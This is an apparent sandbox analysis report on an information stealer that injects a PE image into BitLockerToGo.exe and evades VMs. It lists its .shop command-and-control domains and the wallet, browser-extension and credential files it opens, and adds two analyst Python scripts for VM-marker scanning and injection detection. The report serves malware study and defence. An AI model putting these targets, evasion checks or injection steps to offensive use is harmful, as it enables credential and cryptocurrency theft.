              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: file.exe | Static file information: File size 9048064 > 1048576
              Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a5e00
              Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x445800
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
              Source: file.exeStatic PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D31CCA pushfd ; retf 5_2_02D31CD1
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1768 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5388 | Thread sleep time: -30000s >= -30000s
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005268000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2355600805.000001E6D4DD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWi]
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: BitLockerToGo.exe, 00000005.00000003.2398825174.0000000005263000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information queried: ProcessInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D28E70 LdrInitializeThunk,5_2_02D28E70
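The "System information queried: FirmwareTableInformation" line above is NtQuerySystemInformation with the SystemFirmwareTableInformation class, which is what the documented GetSystemFirmwareTable API wraps. A VM-aware stealer reads the raw SMBIOS (and sometimes ACPI) tables through it and searches for hypervisor vendor strings; a VMware guest, for instance, reports a product name of the form "VMware20,1", the same fragment visible in the memory strings listed above. The script below is an added example for this report, not code from the sample or from Joe Sandbox: on Windows it pulls the raw SMBIOS table with GetSystemFirmwareTable('RSMB') and scans it the way the sample would, so an analyst can see what the sandbox exposed. The marker list, the _raw_smbios builder and the two sample blobs are constructed for illustration and are not taken from the report.

```python
"""Inspect what a VM-aware sample sees in the SMBIOS firmware table.
Added example for this report; not code from the sample or Joe Sandbox."""
import ctypes
import re
import sys

# Vendor strings hypervisors commonly leave in SMBIOS (assumption: illustrative list).
VM_MARKERS = (b"VMware", b"VirtualBox", b"innotek", b"QEMU", b"Xen", b"KVM",
              b"Parallels", b"Bochs", b"Virtual Machine")


def read_raw_smbios() -> bytes:
    """On Windows, fetch the raw SMBIOS table via GetSystemFirmwareTable('RSMB', 0),
    the user-mode wrapper over SystemFirmwareTableInformation. Returns b'' elsewhere
    so the scanning logic can still be exercised offline."""
    if sys.platform != "win32":
        return b""
    k32 = ctypes.WinDLL("kernel32")
    rsmb = int.from_bytes(b"RSMB", "big")          # provider signature as a DWORD
    size = k32.GetSystemFirmwareTable(rsmb, 0, None, 0)
    if size == 0:
        return b""
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(rsmb, 0, buf, size)
    return buf.raw


def smbios_strings(table: bytes, min_len: int = 4) -> list:
    """Printable runs in the table; SMBIOS keeps its text as NUL-terminated strings."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, table)]


def find_vm_markers(table: bytes) -> list:
    """Case-insensitive scan for hypervisor vendor strings; returns the markers hit."""
    lowered = table.lower()
    return [m.decode() for m in VM_MARKERS if m.lower() in lowered]


def _raw_smbios(manufacturer: bytes, product: bytes) -> bytes:
    """Constructed RawSMBIOSData buffer holding one Type 1 (System Information) structure."""
    # Type 1 header: type=1, length=0x1B, handle=0x0100, string indexes for
    # manufacturer(1) and product(2), version/serial unset, 16-byte UUID, wake-up, SKU, family.
    struct = bytes([1, 0x1B, 0x00, 0x01, 1, 2, 0, 0]) + b"\x00" * 16 + bytes([6, 0, 0])
    struct += manufacturer + b"\x00" + product + b"\x00\x00"   # string area, double NUL ends it
    # RawSMBIOSData header: Used20CallingMethod, major, minor, DmiRevision, Length (LE DWORD)
    return bytes([0, 3, 4, 0]) + len(struct).to_bytes(4, "little") + struct


SAMPLE_VMWARE = _raw_smbios(b"VMware, Inc.", b"VMware20,1")      # constructed VM guest
SAMPLE_PHYSICAL = _raw_smbios(b"Dell Inc.", b"OptiPlex 7090")    # constructed bare-metal host

if __name__ == "__main__":
    table = read_raw_smbios() or SAMPLE_VMWARE
    print("SMBIOS strings :", smbios_strings(table))
    print("VM markers     :", find_vm_markers(table) or "none")
```

An empty marker list does not prove a physical host: hardened sandboxes rewrite these strings, and the sample may also pull the 'ACPI' and 'FIRM' providers, which this example does not read.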

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 value starts with: 4D5A
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: demonstationfukewko.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: liabilitynighstjsko.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: alcojoldwograpciw.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: incredibleextedwj.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: shortsvelventysjo.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: shatterbreathepsw.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tolerateilusidjukl.shop
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: productivelookewr.shop
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A23008
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation (3 occurrences)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation (7 occurrences)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
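Read together, the events above describe the injection the Signatures section calls "Injects a PE file into a foreign processes": file.exe creates C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe (a Microsoft-signed binary, which helps the payload pass as legitimate), allocates a region at 2CF0000 in it with page execute and read and write protection, and writes data there that starts with 4D5A, the MZ header of a PE image. The script below is an added example for this report, not Joe Sandbox tooling or code from the sample; it correlates behaviour lines of the shape used on this page ('Source: <process> <event>: <detail>') into that verdict, and accepts both the separated form and the raw run-together form with a trailing "Jump to behavior". The sample lines are constructed to mirror the report; the benign lines are likewise constructed.

```python
"""Correlate sandbox behaviour lines into a PE-injection verdict.
Added example for this report; not Joe Sandbox tooling or code from the sample."""
import re

# 'Source: <src> [| ]<kind>: <detail>[Jump to behavior]'
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Memory allocated|Memory written|Process created):\s*"
    r"(?P<detail>.*?)(?:Jump to behavior)?$")
# '<target> base: <hex> [protect: <text>] [value starts with: <hex>]'
DETAIL_RE = re.compile(
    r"^(?P<target>.+?\.exe)"
    r"(?:\s+base:\s*(?P<base>[0-9A-Fa-f]+))?"
    r"(?:\s+protect:\s*(?P<protect>.+?))?"
    r"(?:\s+value starts with:\s*(?P<prefix>[0-9A-Fa-f]+))?\s*$")


def parse_events(lines):
    """Return dicts for the three event kinds we correlate; other lines are ignored."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src, kind, detail = m.group("src"), m.group("kind"), m.group("detail").strip()
        if kind == "Process created":
            # detail is '<image> <command line>'; the image path here contains no spaces
            events.append({"src": src, "kind": kind, "target": detail.split(" ", 1)[0]})
            continue
        d = DETAIL_RE.match(detail)
        if d:
            events.append({"src": src, "kind": kind, **d.groupdict()})
    return events


def find_pe_injections(lines):
    """Flag a process that writes an MZ header (4D5A) into a different process.
    Each hit records whether the same source allocated that region executable and
    whether it also spawned the target, i.e. the hollowed-host pattern seen here."""
    events = parse_events(lines)
    spawned = {(e["src"].lower(), e["target"].lower())
               for e in events if e["kind"] == "Process created"}
    exec_regions = set()
    for e in events:
        if e["kind"] == "Memory allocated" and "execute" in (e.get("protect") or "").lower():
            exec_regions.add((e["src"].lower(), e["target"].lower(),
                              (e.get("base") or "").upper()))
    hits = []
    for e in events:
        if e["kind"] != "Memory written" or e["src"].lower() == e["target"].lower():
            continue
        if not (e.get("prefix") or "").upper().startswith("4D5A"):
            continue
        base = (e.get("base") or "").upper()
        key = (e["src"].lower(), e["target"].lower(), base)
        hits.append({"source": e["src"], "target": e["target"], "base": base,
                     "executable_region": key in exec_regions,
                     "target_spawned_by_source": key[:2] in spawned})
    return hits


# Constructed lines mirroring this report; the fourth is in the raw unseparated form.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 protect: page execute and read and write",
    r"Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CF0000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A23008",
    r"Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior",
    r"Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: demonstationfukewko.shop",
]
# Constructed benign case: a process writing an MZ header into its own address space.
BENIGN_LINES = [
    r"Source: C:\Users\user\Desktop\app.exe | Memory allocated: C:\Users\user\Desktop\app.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\Desktop\app.exe | Memory written: C:\Users\user\Desktop\app.exe base: 400000 value starts with: 4D5A",
]

if __name__ == "__main__":
    for hit in find_pe_injections(SAMPLE_LINES):
        print(hit)
```

The write at A23008 is not flagged because the report records no MZ prefix for it; on a live host the same three conditions map onto a suspended CreateProcess followed by VirtualAllocEx with an executable protection and WriteProcessMemory, which is what an EDR rule for this technique should key on rather than on the BitLockerToGo.exe name alone.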

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: 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
Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000005.00000003.2398752168.0000000002F03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb391
Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance88+X
Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
